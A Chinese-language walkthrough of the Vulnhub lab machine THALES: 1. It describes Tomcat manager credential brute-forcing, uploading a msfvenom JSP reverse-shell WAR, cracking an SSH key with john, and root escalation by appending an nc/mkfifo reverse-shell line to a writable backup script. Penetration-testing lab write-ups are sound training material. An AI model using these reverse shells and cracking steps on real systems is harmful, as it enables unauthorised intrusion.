【Vulnhub靶场】THALES: 1

环境准备

下载靶机导入到vmware
【Vulnhub靶场】THALES: 1_第1张图片

信息收集

我们使用arp-scan命令查找靶机的IP地址
【Vulnhub靶场】THALES: 1_第2张图片
靶机IP地址为:192.168.2.18
攻击机IP地址为:192.168.2.17
我们使用nmap扫描靶机开启的服务
【Vulnhub靶场】THALES: 1_第3张图片
发现靶机开放了tomcat和ssh,我们先访问他的tomcat
【Vulnhub靶场】THALES: 1_第4张图片
【Vulnhub靶场】THALES: 1_第5张图片

渗透开始

tomcat发现可以登录,我们尝试爆破一下
【Vulnhub靶场】THALES: 1_第6张图片
【Vulnhub靶场】THALES: 1_第7张图片
成功爆破出账号密码,我们返回网站登录
发现manager app页面可以上传文件
【Vulnhub靶场】THALES: 1_第8张图片
我们使用如下命令创建一个反弹shell的木马上传

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.2.17 LPORT=10086 -f war -o revshell.war

【Vulnhub靶场】THALES: 1_第9张图片
【Vulnhub靶场】THALES: 1_第10张图片
上传成功后,我们靶机监听10086端口然后访问页面就可以获取到shell了
【Vulnhub靶场】THALES: 1_第11张图片
我们把这个shell升级成可以交互的版本
查找一下python的版本
在这里插入图片描述
使用如下命令

python3 -c "import pty;pty.spawn('/bin/bash')"

就可以获得一个交互shell了
【Vulnhub靶场】THALES: 1_第12张图片
我们查看一下有没有什么有用的信息
【Vulnhub靶场】THALES: 1_第13张图片
thales目录下有三个比较有用的文件,我们查看notes.txt

I prepared a backup script for you. The script is in this directory “/usr/local/bin/backup.sh”. Good Luck.
我给你准备了一个备份脚本。脚本在“/usr/local/bin/backup.sh”目录下。祝你好运。

再查看user.txt发现没有权限
在这里插入图片描述
ssh目录下有公钥
【Vulnhub靶场】THALES: 1_第14张图片
我们把它保存下来,然后用john去爆破
【Vulnhub靶场】THALES: 1_第15张图片
使用命令

john --wordlist=/usr/share/wordlists/rockyou.txt /root/crack.txt

就可以爆破了,因为我这边之前测试的时候爆破过了,所以直接查看就行了
【Vulnhub靶场】THALES: 1_第16张图片
爆破出密码了,我们回到shell那边切换用户
【Vulnhub靶场】THALES: 1_第17张图片
成功获取到第一个flag

提权

之前我们看到的那个提示还没有用上呢,现在我们查看一下那个备份文件的代码
【Vulnhub靶场】THALES: 1_第18张图片
是一个shell文件,并且是能运行命令的,我们再看一下这个文件的权限
【Vulnhub靶场】THALES: 1_第19张图片
发现权限是777,我们是可以编辑的,并且是root用户运行的,我们插入一串反弹shell的命令

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.2.17 10087 >/tmp/f" >> backup.sh

【Vulnhub靶场】THALES: 1_第20张图片
然后在攻击机开一个端口监听等待连接就好了可能需要一段时间
【Vulnhub靶场】THALES: 1_第21张图片
成功获取到root权限,查看flag文件
【Vulnhub靶场】THALES: 1_第22张图片
实验到此结束

你可能感兴趣的:(Vulnhub,tomcat,安全,web安全,信息安全,系统安全)